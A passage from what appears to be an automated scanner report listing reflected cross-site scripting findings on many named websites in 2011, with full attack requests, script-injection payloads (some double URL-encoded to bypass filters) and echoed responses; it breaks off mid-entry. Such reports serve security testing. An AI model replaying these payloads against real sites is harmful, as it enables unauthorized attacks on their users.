GET /favicon.ico529ec<script>alert(1)</script>d474888bd18 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.game-spotting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 02:33:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=80db2aef25725b17b57b77d65b9f8ded; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 317

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico529ec<script>alert(1)</script>d474888bd18 was not found on this server.<P>
...[SNIP]...

5.8. http://www.hummingbirdmoth.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hummingbirdmoth.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 856bb"><script>alert(1)</script>4ca43521b82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?856bb"><script>alert(1)</script>4ca43521b82=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hummingbirdmoth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 871


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Hummingbirdmoth.com </title>
<META name="description" content="So you th
...[SNIP]...
<frame src="http://173.83.194.219/page5.html/favicon.ico?856bb"><script>alert(1)</script>4ca43521b82=1" frameborder="0" />
...[SNIP]...

5.9. http://www.kiewit.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiewit.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 765f9<script>alert(1)</script>04534598348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?765f9<script>alert(1)</script>04534598348=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kiewit.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4486
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSTCSCB=IIBGNKEACDFAMKMJBMAHCNNG; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>Page Not Fou
...[SNIP]...
<strong>favicon.ico?765f9<script>alert(1)</script>04534598348=1</strong>
...[SNIP]...

5.10. http://www.michaeljfox.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.michaeljfox.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 390a2%253cscript%253ealert%25281%2529%253c%252fscript%253e8b973e2a87c was submitted in the REST URL parameter 1. This input was echoed as 390a2<script>alert(1)</script>8b973e2a87c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /390a2%253cscript%253ealert%25281%2529%253c%252fscript%253e8b973e2a87c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.michaeljfox.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 04 May 2011 04:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=41484280;domain=.michaeljfox.org;expires=Fri, 26-Apr-2041 04:22:23 GMT;path=/
Set-Cookie: CFTOKEN=30677446;domain=.michaeljfox.org;expires=Fri, 26-Apr-2041 04:22:23 GMT;path=/
Set-Cookie: CFID=41484280;path=/
Set-Cookie: CFTOKEN=30677446;path=/
Set-Cookie: USERUUID=41484280%2D30677446%2D05%2D03%2D2011%2D21%2D22%2D23;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D41484280%26CFTOKEN%23%3D30677446%23lastvisit%3D%7Bts%20%272011%2D05%2D03%2021%3A22%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D03%2021%3A22%3A23%27%7D%23hitcount%3D2%23cftoken%3D30677446%23cfid%3D41484280%23;domain=.michaeljfox.org;expires=Fri, 26-Apr-2041 04:22:23 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
<p>
               
                   Sorry, the resource you requested is not found: (http://www.michaeljfox.org/390a2<script>alert(1)</script>8b973e2a87c)<br />
...[SNIP]...

5.11. http://www.mycentraloregon.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycentraloregon.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d43"><script>alert(1)</script>f53c8f63bfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob0d43"><script>alert(1)</script>f53c8f63bfa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycentraloregon.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 03:24:20 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Length: 45926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<meta http-equiv="Content-Type" content
...[SNIP]...
<input type="hidden" name="keypath" value="/favicon.icob0d43"><script>alert(1)</script>f53c8f63bfa" />
...[SNIP]...

5.12. http://www.myfacebooksmileys.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfacebooksmileys.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d1f"><script>alert(1)</script>f2df0242f94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80d1f"><script>alert(1)</script>f2df0242f94=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myfacebooksmileys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>This site is no longer in use </title>

</head>
<frameset rows="100%,*
...[SNIP]...
<frame src="http://nadigo.com/NotInUse.html/favicon.ico?80d1f"><script>alert(1)</script>f2df0242f94=1" frameborder="0" />
...[SNIP]...

5.13. http://www.ntv.ru/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ntv.ru
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35f45<script>alert(1)</script>4c7b378069d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico35f45<script>alert(1)</script>4c7b378069d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ntv.ru
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 04:03:32 GMT
Content-Type: text/html; charset=Windows-1251
Connection: close
Expires: Tue, 01 Jan 1980 00:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=abcY53qgHDKnZ-85ml5_s; path=/
Content-Length: 12865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<t
...[SNIP]...
<code>404: /favicon.ico35f45<script>alert(1)</script>4c7b378069d</code>
...[SNIP]...

5.14. http://www.oldiestelevision.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oldiestelevision.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd7d"><script>alert(1)</script>209ab156e81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?efd7d"><script>alert(1)</script>209ab156e81=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oldiestelevision.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>The Great TV Shows Of The 50's 60's & Roots Of Rock & Roll Oldies Televisio
...[SNIP]...
<frame src="http://xoteria.com/OLDIESTV.html/favicon.ico?efd7d"><script>alert(1)</script>209ab156e81=1" frameborder="0" />
...[SNIP]...

5.15. http://www.paint.net/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paint.net
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2061"><script>alert(1)</script>abb3c0f5f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e2061"><script>alert(1)</script>abb3c0f5f95=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paint.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 439


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>www.paint.net </title>

</head>
<frameset rows="100%,*" border="0">

...[SNIP]...
<frame src="http://www.getpaint.net/redirect/wp/index.html/favicon.ico?e2061"><script>alert(1)</script>abb3c0f5f95=1" frameborder="0" />
...[SNIP]...

5.16. http://www.peoplesgas.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.peoplesgas.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5fa9<a>3c1d96aa34b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?a5fa9<a>3c1d96aa34b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplesgas.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 04 May 2011 03:47:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=e6303b2fc1187c2f1e2e;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<em>http://www.peoplesgas.com/favicon.ico?a5fa9<a>3c1d96aa34b=1</em>
...[SNIP]...

5.17. http://www.reverendfun.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reverendfun.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 421f5"><script>alert(1)</script>cac5f022d86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico421f5"><script>alert(1)</script>cac5f022d86 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverendfun.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:38:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: r_id=334ec2afd06d6b495552edb41416a0dc; expires=Fri, 08-Jul-2033 22:05:30 GMT; path=/
Content-Length: 6280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<input size="50" name="to" value="http://www.reverendfun.com/favicon.ico421f5"><script>alert(1)</script>cac5f022d86" />
...[SNIP]...

5.18. http://www.rockymounttelegram.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockymounttelegram.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feadd"><script>alert(1)</script>10a3d2557dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofeadd"><script>alert(1)</script>10a3d2557dc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rockymounttelegram.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:53:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESSafa15434f65814106549db0d4e89abee=83ce4ef73222cd847b28bf76507278bb; expires=Fri, 27-May-2011 04:24:02 GMT; path=/; domain=.rockymounttelegram.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:50:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 20025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
<A href="/user/login?destination=favicon.icofeadd"><script>alert(1)</script>10a3d2557dc">
...[SNIP]...

5.19. http://www.everydentist.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydentist.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ee6f9--><script>alert(1)</script>14a6a88578b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydentist.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=ee6f9--><script>alert(1)</script>14a6a88578b

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12345
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSARARCT=CIJJDBFAHJFGHIHBCNBEFIIM; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><!-- InstanceBegin template="/Templates/home.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<
...[SNIP]...
<!-- http://www.google.com/search?hl=en&q=ee6f9--><script>alert(1)</script>14a6a88578b-->
...[SNIP]...

5.20. http://www.idxcentral.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.idxcentral.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8e8"><a>0817078a05d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.idxcentral.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=5c8e8"><a>0817078a05d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=3768507;expires=Fri, 26-Apr-2041 01:47:26 GMT;path=/
Set-Cookie: CFTOKEN=35097486;expires=Fri, 26-Apr-2041 01:47:26 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:47:26 GMT
Content-Length: 3592


<html>
<head>
<title>Moineau Design :: Web Design</title>
<!-- Moineau Design -->
<!-- 530.577.8027 -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="d
...[SNIP]...
<a href="javascript:;" onClick="ContactUs=window.open('http://www.mdadvertising.com/contact_general.cfm?Ref=http://www.google.com/search?hl=en&q=5c8e8"><a>0817078a05d&IP=173.193.214.243','ContactMoineauDesign','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=yes,width=475,height=510,left=50,top=50'); return false;">
...[SNIP]...

5.21. http://www.wardsci.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wardsci.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ee639--><a>f2d1af9db6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wardsci.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=ee639--><a>f2d1af9db6e

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://wardsci.com/rc.asp?oc=SITE&ky=&bt=%2Farticle%2Easp%3Fai%3D230
Content-Length: 24556
Content-Type: text/html
Expires: Wed, 04 May 2011 03:44:40 GMT
Set-Cookie: CM%5Fcat=ARTICLE; expires=Thu, 03-May-2012 03:44:40 GMT; path=/
Set-Cookie: sh%5Fpr=Y; expires=Tue, 10-May-2011 04:00:00 GMT; path=/
Set-Cookie: rl=article%2Easp%3Fai%3D230; path=/
Set-Cookie: eid=; expires=Wed, 11-May-2011 03:44:40 GMT; path=/
Set-Cookie: sid=; path=/
Set-Cookie: ky=; expires=Wed, 11-May-2011 03:45:00 GMT; path=/
Set-Cookie: rt=Articles; path=/
Set-Cookie: oc=SITE; expires=Wed, 11-May-2011 03:45:00 GMT; path=/
Set-Cookie: id=154B9E954UE2; expires=Fri, 03-May-2013 03:44:40 GMT; path=/
Set-Cookie: ASPSESSIONIDAASQDCSC=DMDDAJNDJPPCEPMDFAGKEOEO; path=/
Cache-control: private

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

<title>404 Page Not Found</title>
<link rel="shortcut icon" href="http://vwreducation.com/images/wrd/favicon.ico" typ
...[SNIP]...
<!-- Referer: http://www.google.com/search?hl=en&q=ee639--><a>f2d1af9db6e -->
...[SNIP]...

5.22. http://www.ammessages6.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ammessages6.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e65df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6568ea91091 was submitted in the REST URL parameter 1. This input was echoed as e65df"><script>alert(1)</script>6568ea91091 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icoe65df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6568ea91091 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ammessages6.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 01:10:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash05
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://www.amateurmatch.com/favicon.icoe65df"><script>alert(1)</script>6568ea91091
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.icoe65df"><script>alert(1)</script>6568ea91091">here</a>.</body
...[SNIP]...

5.23. http://www.ammessages6.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ammessages6.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c807"><script>alert(1)</script>85d6f180f15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?1c807"><script>alert(1)</script>85d6f180f15=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ammessages6.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 01:10:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash01
X-AspNet-Version: 2.0.50727
Content-Length: 206
Location: http://www.amateurmatch.com/favicon.ico?1c807"><script>alert(1)</script>85d6f180f15=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.ico?1c807"><script>alert(1)</script>85d6f180f15=1">here</a>.</b
...[SNIP]...

5.24. http://www.dbfx.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dbfx.net
Path:   /favicon.ico

